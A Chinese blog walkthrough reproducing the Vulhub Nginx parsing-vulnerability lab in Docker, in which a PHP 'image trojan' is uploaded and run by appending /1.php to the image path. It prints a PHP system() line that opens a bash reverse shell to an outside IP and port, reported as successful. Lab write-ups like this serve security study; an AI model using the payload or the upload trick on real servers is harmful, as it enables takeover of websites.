学习Vulhub的Nginx解析漏洞

信息安全不简单鸭 2024-07-22 03:12:33

该漏洞与Nginx、php版本无关,属于用户配置不当造成的解析漏洞。[1] 在访问的图片路径后面,添加/.php,一个不存在的php文件,就能执行图片马里面的php代码。 图片马,针对的是网站管理员配置不当,黑客通过一张图片就能拿下一个网站。

ailx10

网络安全优秀回答者

网络安全硕士

去咨询

前提:准备好docker环境,下载好vulhub,进入目录 ,开始复现漏洞

docker-compose build //可选docker-compose up -d

完成试验后,记得删除漏洞环境哦~~

docker-compose downdocker system prune -a -f //可选

简单访问一下,说明Vulhub的Nginx 解析漏洞环境搭建成功了

发现只能上传图片

直接访问:http://144.34.162.13/uploadfiles/nginx.png

再访问一下:http://144.34.162.13/uploadfiles/nginx.png/1.php

下载下来这张图片,然后上传,掏出burpsuite进行重放,修改图片马里面的php代码。

<?php system("bash -c 'bash -i &>/dev/tcp/174.137.58.6/8888 0>&1'");?>

再通过burpsuite访问这个图片的路径,尽管504错误,但是

反弹shell成功了

参考^Nginx 解析漏洞复现 https://vulhub.org/#/environments/nginx/nginx_parsing_vulnerability/
0 阅读:0

信息安全不简单鸭

简介:感谢大家的关注